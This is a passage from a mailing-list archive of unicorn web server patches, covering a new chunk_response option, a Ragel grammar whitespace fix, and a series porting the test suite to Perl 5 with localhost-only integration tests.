+        server.chunk_response = true if server.chunk_response.nil?
       when "deployment"
+        server.chunk_response = true if server.chunk_response.nil?
         middleware.delete(:ShowExceptions)
         middleware.delete(:Lint)
       else
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index ecdf03e..bbc0448 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -59,6 +59,7 @@ class Unicorn::Configurator
     :check_client_connection => false,
     :rewindable_input => true,
     :client_body_buffer_size => Unicorn::Const::MAX_BODY,
+    :chunk_response => nil,
   }
   #:startdoc:
 
@@ -129,6 +130,19 @@ def [](key) # :nodoc:
     set[key]
   end
 
+  # Whether or not to chunk eligible HTTP/1.1 responses.  This is
+  # necessary for Rack 3.1+ users where the Rack::Chunked middleware
+  # no longer exists.
+  # Default: +true+ if +default_middleware+ is +true+ AND
+  # RACK_ENV is either +development+ or +deployment+.
+  # It is +false+ otherwise to support broken clients advertising
+  # HTTP/1.1 but lacking the ability to parse chunked responses.
+  # +chunk_response+ only exists since unicorn 7.0+ (the first release
+  # with Rack 3.x support).
+  def chunk_response(bool)
+    set_bool(:chunk_response, bool)
+  end
+
   # sets object to the +obj+ Logger-like object.  The new Logger-like
   # object must respond to the following methods:
   # * debug
@@ -270,7 +284,8 @@ def worker_processes(nr)
   end
 
   # sets whether to add default middleware in the development and
-  # deployment RACK_ENVs.
+  # deployment RACK_ENVs.  This also affects the +chunk_response+
+  # directive in unicorn 7.0+
   #
   # default_middleware is only available in unicorn 5.5.0+
   def default_middleware(bool)
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..c73efe9 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -68,7 +68,7 @@ def http_response_write(socket, status, headers, body,
           append_header(buf, key, value)
         end
       end
-      if !hijack && !term && req.chunkable_response?
+      if !hijack && !term && req.chunkable_response? && @chunk_response
         do_chunk = true
         buf << "Transfer-Encoding: chunked\r\n".freeze
       end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..93d7141 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -15,7 +15,7 @@ class Unicorn::HttpServer
                 :before_fork, :after_fork, :before_exec,
                 :listener_opts, :preload_app,
                 :orig_app, :config, :ready_pipe, :user,
-                :default_middleware, :early_hints
+                :default_middleware, :early_hints, :chunk_response
   attr_writer   :after_worker_exit, :after_worker_ready, :worker_exec
 
   attr_reader :pid, :logger
@@ -69,6 +69,7 @@ class Unicorn::HttpServer
   # incoming requests on the socket.
   def initialize(app, options = {})
     @app = app
+    @chunk_response = nil
     @reexec_pid = 0
     @default_middleware = true
     options = options.dup
diff --git a/t/integration.ru b/t/integration.ru
index 086126a..d8a8178 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -85,6 +85,12 @@ def rack_input_tests(env)
   [ 200, h, [ dig.hexdigest ] ]
 end
 
+class NoArray
+  def each
+    yield "HI\n"
+  end
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -98,6 +104,7 @@ def rack_input_tests(env)
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
+    when '/no-ary'; [ 200, {}, NoArray.new ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index bb2ab51..115a761 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -22,6 +22,13 @@ my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+my $wait_fifo = sub {
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$wpid;
+};
+
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
@@ -176,6 +183,78 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+my $tmp = { 3 => tcp_server() };
+my $no_ary = "GET /no-ary HTTP/1.1\r\nHost: example.com\r\n\r\n";
+if (diag('chunk_response is off by default w/ RACK_ENV=none') || 1) {
+	print { $c = tcp_start($srv) } $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+		'no Transfer-Encoding for RACK_ENV=none despite HTTP/1.1');
+	local $/;
+	is(readline($c), "HI\n", 'unchunked body response');
+}
+
+# pretend we have Rack::Chunked for RACK_ENV=(deployment|development)
+for my $rack_env (qw(deployment development)) {
+	my $cfg = "$tmpdir/nochunk.conf.rb";
+	open my $fh, '>', $cfg;
+	my $u = unicorn('-E', $rack_env, qw(t/integration.ru -c), $cfg, $tmp);
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	like("@$hdr", qr/Transfer-Encoding/i,
+		"Transfer-Encoding set by default for RACK_ENV=$rack_env");
+	is(do { local $/; readline($c) },
+		"3\r\nHI\n\r\n0\r\n\r\n", 'chunked body response');
+
+	print $fh <<EOM;
+chunk_response false
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	close $fh;
+	$u->do_kill('HUP');
+	$wait_fifo->();
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+			"RACK_ENV=$rack_env w/ chunk_response false");
+	is(do { local $/; readline($c) },
+		"HI\n", 'unchunked body response');
+}
+
+if (diag('chunk_response true w/ RACK_ENV=none') || 1) {
+	my $cfg = "$tmpdir/chunk.conf.rb";
+	open my $fh, '>', $cfg;
+	print $fh "chunk_response true\n";
+	close $fh;
+	my $u = unicorn(qw(-E none t/integration.ru -c), $cfg, $tmp);
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	like("@$hdr", qr/Transfer-Encoding/i,
+		"Transfer-Encoding set by chunk_response true");
+	is(do { local $/; readline($c) },
+		"3\r\nHI\n\r\n0\r\n\r\n", 'chunked body response');
+
+	# reset to default:
+	open $fh, '>', $cfg;
+	print $fh <<EOM;
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	close $fh;
+	$u->do_kill('HUP');
+	$wait_fifo->();
+
+	$c = tcp_start($tmp->{3});
+	print $c $no_ary;
+	($status, $hdr) = slurp_hdr($c);
+	unlike("@$hdr", qr/Transfer-Encoding/i,
+			'chunk_response back to default (off) after HUP reset');
+	is(do { local $/; readline($c) },
+		"HI\n", 'unchunked body response after HUP reset');
+}
+
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
@@ -287,9 +366,7 @@ check_client_connection true
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 	$ar->do_kill('HUP');
-	open my $fifo_fh, '<', $fifo;
-	my $wpid = readline($fifo_fh);
-	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	$wait_fifo->();
 	$ck_early_hints->('ccc on');
 }
 
@@ -301,10 +378,7 @@ if ('max_header_len internal API') {
 Unicorn::HttpParser.max_header_len = $len
 EOM
 	$ar->do_kill('HUP');
-	open my $fifo_fh, '<', $fifo;
-	my $wpid = readline($fifo_fh);
-	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
-	close $fifo_fh;
+	my $wpid = $wait_fifo->();
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 

^ permalink raw reply related	[relevance 1%]

* [PATCH] unicorn_http_common.rl: use only ASCII spaces for compatibility
@ 2023-06-20 10:46  3% EW
  0 siblings, 0 replies; 200+ results
From: EW @ 2023-06-20 10:46 UTC (permalink / raw)
  To: unicorn-public

Ragel 6.10 on FreeBSD 12.4 amd64 complains and fails on this, yet the same
Ragel version on Debian 11.x i386 and amd64 never has.  I suspect this can
fix compatibility on s390x, arm64, armel, and armhf Debian builds:

https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=s390x&ver=6.1.0-1&stamp=1687156375&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=arm64&ver=6.1.0-1&stamp=1687156478&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=armel&ver=6.1.0-1&stamp=1687156619&file=log
https://buildd.debian.org/status/fetch.php?pkg=unicorn&arch=armhf&ver=6.1.0-1&stamp=1687156807&file=log

Fixes: d5fbbf547203061b (Add some tolerance (RFC2616 sec. 19.3), 2016-10-20)
---
 ext/unicorn_http/unicorn_http_common.rl | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ext/unicorn_http/unicorn_http_common.rl b/ext/unicorn_http/unicorn_http_common.rl
index 0988b54..507e570 100644
--- a/ext/unicorn_http/unicorn_http_common.rl
+++ b/ext/unicorn_http/unicorn_http_common.rl
@@ -4,7 +4,7 @@
 
 #### HTTP PROTOCOL GRAMMAR
 # line endings
-  CRLF = ("\r\n" | "\n");
+  CRLF = ("\r\n" | "\n");
 
 # character types
   CTL = (cntrl | 127);

^ permalink raw reply related	[relevance 3%]

* [PATCH 00-23/23] start porting tests to Perl5
@ 2023-06-05 10:32  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05 10:32 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4179 bytes --]

Still a lot more work to do, but at least socat is no longer a
test dependency.  Perl5 is installed on far more systems than
socat.

Ruby introduces breaking changes every year and I can no longer
trust tests to keep working as they were originally intended.
Perl 5 doesn't have perfect backwards compatibility either, but
it's the least bad of any widely-installed scripting language.

Note that 23/23 introduces a subtle bugfix which changes
behavior for systemd users.

Patches are attached to reduce load on SMTP servers.
Some more patches to come as I deal with Ruby 3.x deprecation
warnings :<

Eric Wong (23):
  switch unit/test_response.rb to Perl 5 integration test
  support rack 3 multi-value headers
  port t0018-write-on-close.sh to Perl 5
  port t0000-http-basic.sh to Perl 5
  port t0002-parser-error.sh to Perl 5
  t/integration.t: use start_req to simplify test slightly
  port t0011-active-unix-socket.sh to Perl 5
  port t0100-rack-input-tests.sh to Perl 5
  tests: use autodie to simplify error checking
  port t0019-max_header_len.sh to Perl 5
  test_exec: drop sd_listen_fds emulation test
  test_exec: drop test_basic and test_config_ru_alt_path
  tests: check_stderr consistently in Perl 5 tests
  tests: consistent tcp_start and unix_start across Perl 5 tests
  port t9000-preread-input.sh to Perl 5
  port t/t0116-client_body_buffer_size.sh to Perl 5
  tests: get rid of sha1sum.rb and rsha1() sh function
  early_hints supports Rack 3 array headers
  test_server: drop early_hints test
  t/integration.t: switch PUT tests to MD5, reuse buffers
  tests: move test_upload.rb tests to t/integration.t
  drop redundant IO#close_on_exec=false calls
  LISTEN_FDS-inherited sockets are immortal across SIGHUP

 GNUmakefile                                |   7 +-
 lib/unicorn/http_server.rb                 |  12 +-
 t/README                                   |  21 +-
 t/active-unix-socket.t                     | 113 +++++++
 t/bin/content-md5-put                      |  36 ---
 t/bin/sha1sum.rb                           |  17 --
 t/{t0116.ru => client_body_buffer_size.ru} |   2 -
 t/client_body_buffer_size.t                |  82 ++++++
 t/integration.ru                           | 114 +++++++
 t/integration.t                            | 326 +++++++++++++++++++++
 t/lib.perl                                 | 217 ++++++++++++++
 t/preread_input.ru                         |  21 +-
 t/rack-input-tests.ru                      |  21 --
 t/t0000-http-basic.sh                      |  50 ----
 t/t0002-parser-error.sh                    |  94 ------
 t/t0011-active-unix-socket.sh              |  79 -----
 t/t0018-write-on-close.sh                  |  23 --
 t/t0019-max_header_len.sh                  |  49 ----
 t/t0100-rack-input-tests.sh                | 124 --------
 t/t0116-client_body_buffer_size.sh         |  80 -----
 t/t9000-preread-input.sh                   |  48 ---
 t/test-lib.sh                              |   4 -
 t/write-on-close.ru                        |  11 -
 test/exec/test_exec.rb                     |  57 ----
 test/unit/test_response.rb                 | 111 -------
 test/unit/test_server.rb                   |  31 --
 test/unit/test_upload.rb                   | 301 -------------------
 27 files changed, 891 insertions(+), 1160 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/bin/content-md5-put
 delete mode 100755 t/bin/sha1sum.rb
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0000-http-basic.sh
 delete mode 100755 t/t0002-parser-error.sh
 delete mode 100755 t/t0011-active-unix-socket.sh
 delete mode 100755 t/t0018-write-on-close.sh
 delete mode 100755 t/t0019-max_header_len.sh
 delete mode 100755 t/t0100-rack-input-tests.sh
 delete mode 100755 t/t0116-client_body_buffer_size.sh
 delete mode 100755 t/t9000-preread-input.sh
 delete mode 100644 t/write-on-close.ru
 delete mode 100644 test/unit/test_response.rb
 delete mode 100644 test/unit/test_upload.rb

[-- Attachment #2: 0001-switch-unit-test_response.rb-to-Perl-5-integration-t.patch --]
[-- Type: text/x-diff, Size: 15667 bytes --]

From 086e397abc0126556af24df77a976671294df2ee Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:30 +0000
Subject: [PATCH 01/23] switch unit/test_response.rb to Perl 5 integration test

http_response_write may benefit from API changes for Rack 3
support.

Since there's no benefit I can see from using a unit test,
switch to an integration test to avoid having to maintain the
unit test if our internal http_response_write method changes.

Of course, I can't trust tests written in Ruby since I've had to
put up with a constant stream of incompatibilities over the past
two decades :<   Perl is more widely installed than socat[1], and
nearly all the Perl I wrote 20 years ago still works
unmodified today.

[1] the rarest dependency of the Bourne shell integration tests
---
 GNUmakefile                |   5 +-
 t/README                   |  24 +++--
 t/integration.ru           |  38 ++++++++
 t/integration.t            |  64 +++++++++++++
 t/lib.perl                 | 189 +++++++++++++++++++++++++++++++++++++
 test/unit/test_response.rb | 111 ----------------------
 6 files changed, 313 insertions(+), 118 deletions(-)
 create mode 100644 t/integration.ru
 create mode 100644 t/integration.t
 create mode 100644 t/lib.perl
 delete mode 100644 test/unit/test_response.rb

diff --git a/GNUmakefile b/GNUmakefile
index 0e08ef0..5cca189 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -86,7 +86,7 @@ $(tmp_bin)/%: bin/% | $(tmp_bin)
 bins: $(tmp_bins)
 
 t_log := $(T_log) $(T_n_log)
-test: $(T) $(T_n)
+test: $(T) $(T_n) test-prove
 	@cat $(t_log) | $(MRI) test/aggregate.rb
 	@$(RM) $(t_log)
 
@@ -141,6 +141,9 @@ t/random_blob:
 
 test-integration: $(T_sh)
 
+test-prove:
+	prove -vw
+
 check: test-require test test-integration
 test-all: check
 
diff --git a/t/README b/t/README
index 14de559..8a5243e 100644
--- a/t/README
+++ b/t/README
@@ -5,16 +5,24 @@ TCP ports or Unix domain sockets.  They're all designed to run
 concurrently with other tests to minimize test time, but tests may be
 run independently as well.
 
-We write our tests in Bourne shell because that's what we're
-comfortable writing integration tests with.
+New tests are written in Perl 5 because we need a stable language
+to test real-world behavior and Ruby introduces incompatibilities
+at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
+it should be easy to learn for Rubyists.
+
+Old tests are in Bourne shell, but their socat(1) dependency is far
+less commonly installed than Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/] (duh!)
+* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
+
+The following requirements will eventually be dropped.
+
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
-* standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
@@ -26,9 +34,13 @@ with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
 
 To run the entire test suite with 8 tests running at once:
 
-  make -j8
+  make -j8 && prove -vw
+
+To run one individual test (Perl5):
+
+  prove -vw t/integration.t
 
-To run one individual test:
+To run one individual test (shell):
 
   make t0000-simple-http.sh
 
diff --git a/t/integration.ru b/t/integration.ru
new file mode 100644
index 0000000..6ef873c
--- /dev/null
+++ b/t/integration.ru
@@ -0,0 +1,38 @@
+#!ruby
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+# this goes for t/integration.t  We'll try to put as many tests
+# in here as possible to avoid startup overhead of Ruby.
+
+$orig_rack_200 = nil
+def tweak_status_code
+  $orig_rack_200 = Rack::Utils::HTTP_STATUS_CODES[200]
+  Rack::Utils::HTTP_STATUS_CODES[200] = "HI"
+  [ 200, {}, [] ]
+end
+
+def restore_status_code
+  $orig_rack_200 or return [ 500, {}, [] ]
+  Rack::Utils::HTTP_STATUS_CODES[200] = $orig_rack_200
+  [ 200, {}, [] ]
+end
+
+run(lambda do |env|
+  case env['REQUEST_METHOD']
+  when 'GET'
+    case env['PATH_INFO']
+    when '/rack-2-newline-headers'; [ 200, { 'X-R2' => "a\nb\nc" }, [] ]
+    when '/nil-header-value'; [ 200, { 'X-Nil' => nil }, [] ]
+    when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
+    end # case PATH_INFO (GET)
+  when 'POST'
+    case env['PATH_INFO']
+    when '/tweak-status-code'; tweak_status_code
+    when '/restore-status-code'; restore_status_code
+    end # case PATH_INFO (POST)
+    # ...
+  when 'PUT'
+    # ...
+  end # case REQUEST_METHOD
+end) # run
diff --git a/t/integration.t b/t/integration.t
new file mode 100644
index 0000000..5569155
--- /dev/null
+++ b/t/integration.t
@@ -0,0 +1,64 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+my $srv = tcp_server();
+my $t0 = time;
+my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
+my ($c, $status, $hdr);
+
+# response header tests
+$c = tcp_connect($srv);
+print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+my $orig_200_status = $status;
+is_deeply([ grep(/^X-R2: /, @$hdr) ],
+	[ 'X-R2: a', 'X-R2: b', 'X-R2: c' ],
+	'rack 2 LF-delimited headers supported') or diag(explain($hdr));
+
+SKIP: { # Date header check
+	my @d = grep(/^Date: /i, @$hdr);
+	is(scalar(@d), 1, 'got one date header') or diag(explain(\@d));
+	eval { require HTTP::Date } or skip "HTTP::Date missing: $@", 1;
+	$d[0] =~ s/^Date: //i or die 'BUG: did not strip date: prefix';
+	my $t = HTTP::Date::str2time($d[0]);
+	ok($t >= $t0 && $t > 0 && $t <= time, 'valid date') or
+		diag(explain([$t, $!, \@d]));
+};
+
+# cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+$c = tcp_connect($srv);
+print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+($status, $hdr) = slurp_hdr($c);
+is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
+	'nil header value accepted for broken apps') or diag(explain($hdr));
+
+if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
+	$c = tcp_connect($srv);
+	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
+
+	$c = tcp_connect($srv);
+	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	($status, $hdr) = slurp_hdr($c);
+	is($status, $orig_200_status, 'original status restored');
+}
+
+
+# ... more stuff here
+undef $ar;
+diag slurp("$tmpdir/err.log") if $ENV{V};
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
new file mode 100644
index 0000000..dd9c6b7
--- /dev/null
+++ b/t/lib.perl
@@ -0,0 +1,189 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@80x24.org>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+package UnicornTest;
+use v5.14;
+use parent qw(Exporter);
+use Test::More;
+use IO::Socket::INET;
+use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
+use File::Temp 0.19 (); # 0.19 for ->newdir
+our ($tmpdir, $errfh);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
+	SEEK_SET);
+
+my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
+$tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+
+sub tcp_server {
+	my %opt = (
+		ReuseAddr => 1,
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		Listen => SOMAXCONN,
+		Blocking => 0,
+		@_,
+	);
+	eval {
+		die 'IPv4-only' if $ENV{TEST_IPV4_ONLY};
+		require IO::Socket::INET6;
+		IO::Socket::INET6->new(%opt, LocalAddr => '[::1]')
+	} || eval {
+		die 'IPv6-only' if $ENV{TEST_IPV6_ONLY};
+		IO::Socket::INET->new(%opt, LocalAddr => '127.0.0.1')
+	} || BAIL_OUT "failed to create TCP server: $! ($@)";
+}
+
+sub tcp_host_port {
+	my ($s) = @_;
+	my ($h, $p) = ($s->sockhost, $s->sockport);
+	my $ipv4 = $s->sockdomain == AF_INET;
+	if (wantarray) {
+		$ipv4 ? ($h, $p) : ("[$h]", $p);
+	} else {
+		$ipv4 ? "$h:$p" : "[$h]:$p";
+	}
+}
+
+sub tcp_connect {
+	my ($dest, %opt) = @_;
+	my $addr = tcp_host_port($dest);
+	my $s = ref($dest)->new(
+		Proto => 'tcp',
+		Type => SOCK_STREAM,
+		PeerAddr => $addr,
+		%opt,
+	) or BAIL_OUT "failed to connect to $addr: $!";
+	$s->autoflush(1);
+	$s;
+}
+
+sub slurp {
+	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	local $/;
+	<$fh>;
+}
+
+sub spawn {
+	my $env = ref($_[0]) eq 'HASH' ? shift : undef;
+	my $opt = ref($_[-1]) eq 'HASH' ? pop : {};
+	my @cmd = @_;
+	my $old = POSIX::SigSet->new;
+	my $set = POSIX::SigSet->new;
+	$set->fillset or die "sigfillset: $!";
+	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
+	pipe(my ($r, $w)) or die "pipe: $!";
+	my $pid = fork // die "fork: $!";
+	if ($pid == 0) {
+		close $r;
+		$SIG{__DIE__} = sub {
+			warn(@_);
+			syswrite($w, my $num = $! + 0);
+			_exit(1);
+		};
+
+		# pretend to be systemd (cf. sd_listen_fds(3))
+		my $cfd;
+		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
+			my $io = $opt->{$cfd} // next;
+			my $pfd = fileno($io) // die "fileno($io): $!";
+			if ($pfd == $cfd) {
+				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+			} else {
+				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
+			}
+		}
+		if (($cfd - 3) > 0) {
+			$env->{LISTEN_PID} = $$;
+			$env->{LISTEN_FDS} = $cfd - 3;
+		}
+
+		if (defined(my $pgid = $opt->{pgid})) {
+			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
+		}
+		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
+		if (defined(my $cd = $opt->{-C})) {
+			chdir $cd // die "chdir($cd): $!";
+		}
+		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
+		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
+		@ENV{keys %$env} = values(%$env) if $env;
+		exec { $cmd[0] } @cmd;
+		die "exec @cmd: $!";
+	}
+	close $w;
+	sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK(old): $!";
+	if (my $cerrnum = do { local $/, <$r> }) {
+		$! = $cerrnum;
+		die "@cmd PID=$pid died: $!";
+	}
+	$pid;
+}
+
+sub which {
+	my ($file) = @_;
+	return $file if index($file, '/') >= 0;
+	for my $p (split(/:/, $ENV{PATH})) {
+		$p .= "/$file";
+		return $p if -x $p;
+	}
+	undef;
+}
+
+# returns an AutoReap object
+sub unicorn {
+	my %env;
+	if (ref($_[0]) eq 'HASH') {
+		my $e = shift;
+		%env = %$e;
+	}
+	my @args = @_;
+	push(@args, {}) if ref($args[-1]) ne 'HASH';
+	$args[-1]->{2} //= $errfh; # stderr default
+
+	state $ruby = which($ENV{RUBY} // 'ruby');
+	state $lib = File::Spec->rel2abs('lib');
+	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
+	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
+	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
+	state $exe = File::Spec->rel2abs('bin/unicorn');
+	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
+	UnicornTest::AutoReap->new($pid);
+}
+
+# automatically kill + reap children when this goes out-of-scope
+package UnicornTest::AutoReap;
+use v5.14;
+
+sub new {
+	my (undef, $pid) = @_;
+	bless { pid => $pid, owner => $$ }, __PACKAGE__
+}
+
+sub kill {
+	my ($self, $sig) = @_;
+	CORE::kill($sig // 'TERM', $self->{pid});
+}
+
+sub join {
+	my ($self, $sig) = @_;
+	my $pid = delete $self->{pid} or return;
+	CORE::kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	$ret == $pid or die "BUG: waitpid($pid) != $ret";
+}
+
+sub DESTROY {
+	my ($self) = @_;
+	return if $self->{owner} != $$;
+	$self->join('TERM');
+}
+
+package main; # inject ourselves into the t/*.t script
+UnicornTest->import;
+Test::More->import;
+# try to ensure ->DESTROY fires:
+$SIG{TERM} = sub { exit(15 + 128) };
+$SIG{INT} = sub { exit(2 + 128) };
+1;
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
deleted file mode 100644
index fbe433f..0000000
--- a/test/unit/test_response.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-# -*- encoding: binary -*-
-
-# Copyright (c) 2005 Zed A. Shaw
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-#
-# Additional work donated by contributors.  See git history
-# for more information.
-
-require './test/test_helper'
-require 'time'
-
-include Unicorn
-
-class ResponseTest < Test::Unit::TestCase
-  include Unicorn::HttpResponse
-
-  def test_httpdate
-    before = Time.now.to_i - 1
-    str = httpdate
-    assert_kind_of(String, str)
-    middle = Time.parse(str).to_i
-    after = Time.now.to_i
-    assert before <= middle
-    assert middle <= after
-  end
-
-  def test_response_headers
-    out = StringIO.new
-    http_response_write(out, 200, {"X-Whatever" => "stuff"}, ["cool"])
-    assert ! out.closed?
-
-    assert out.length > 0, "output didn't have data"
-  end
-
-  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-  def test_response_header_broken_nil
-    out = StringIO.new
-    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
-    assert ! out.closed?
-
-    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
-  end
-
-  def test_response_string_status
-    out = StringIO.new
-    http_response_write(out,'200', {}, [])
-    assert ! out.closed?
-    assert out.length > 0, "output didn't have data"
-  end
-
-  def test_response_200
-    io = StringIO.new
-    http_response_write(io, 200, {}, [])
-    assert ! io.closed?
-    assert io.length > 0, "output didn't have data"
-  end
-
-  def test_response_with_default_reason
-    code = 400
-    io = StringIO.new
-    http_response_write(io, code, {}, [])
-    assert ! io.closed?
-    lines = io.string.split(/\r\n/)
-    assert_match(/.* Bad Request$/, lines.first,
-                 "wrong default reason phrase")
-  end
-
-  def test_rack_multivalue_headers
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff\nbleh"}, [])
-    assert ! out.closed?
-    assert_match(/^X-Whatever: stuff\r\nX-Whatever: bleh\r\n/, out.string)
-  end
-
-  # Even though Rack explicitly forbids "Status" in the header hash,
-  # some broken clients still rely on it
-  def test_status_header_added
-    out = StringIO.new
-    http_response_write(out,200, {"X-Whatever" => "stuff"}, [])
-    assert ! out.closed?
-  end
-
-  def test_unknown_status_pass_through
-    out = StringIO.new
-    http_response_write(out,"666 I AM THE BEAST", {}, [] )
-    assert ! out.closed?
-    headers = out.string.split(/\r\n\r\n/).first.split(/\r\n/)
